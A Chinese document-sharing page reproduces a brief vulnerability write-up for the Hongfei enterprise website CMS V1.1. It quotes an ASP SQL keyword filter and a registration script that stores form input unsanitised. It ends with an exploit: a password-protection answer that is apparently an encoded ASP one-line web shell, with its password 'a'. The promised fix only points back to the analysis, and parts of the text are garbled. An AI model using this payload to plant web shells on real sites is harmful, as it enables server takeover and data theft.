宏飞企业网站管理系统V1.1漏洞及修复-电脑资料
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
宏飞企业网站管理系统V1.1漏洞及修复-电脑资料
is87_sql.asp
<%
Dim GetFlag Rem(提交方式)
Dim ErrorSql Rem(非法字符)
'..略
ErrorSql = "'~;~and~(~)~exec~update~count~*~%~chr~mid~master~tru ncate~char~declare" Rem(每个敏感字符或者词语请使用半角 "~" 格开)
ErrorSql = split(ErrorSql,"~")
'..略
If
Instr(LCase(Request.QueryString(RequestKey)),ErrorSql(ForI))<> 0 Then
response.write ""
'..略
response.write ""
'..略
%>
过滤问题,。
'\member\register_pass.asp
<%
dim
u,i,letters,ip,useradmin,userpassword,userpassword2,sh,zsname, sex,wen,da,gsname,gsadd,youbian,tel,fax,sj,mail,wz,VerifyCode ip=request.servervariables("remote_addr")
useradmin=replace(trim(request("useradmin")),"'","")
'..略
zsname=request.form("zsname")
'..略
rs("userpassword")=md5(request.form("userpassword"))
rs("zsname")=zsname
rs("sex")=sex
Response.Write ""
%>
直接写入数据库,
电脑资料
《宏飞企业网站管理系统V1.1 漏洞及修复》(https://)。
注册会员,密码保护答案:┼攠數畣整爠煥敵瑳∨≡┩>
密码:a
修复:见上文分析
摘自:
下载文档。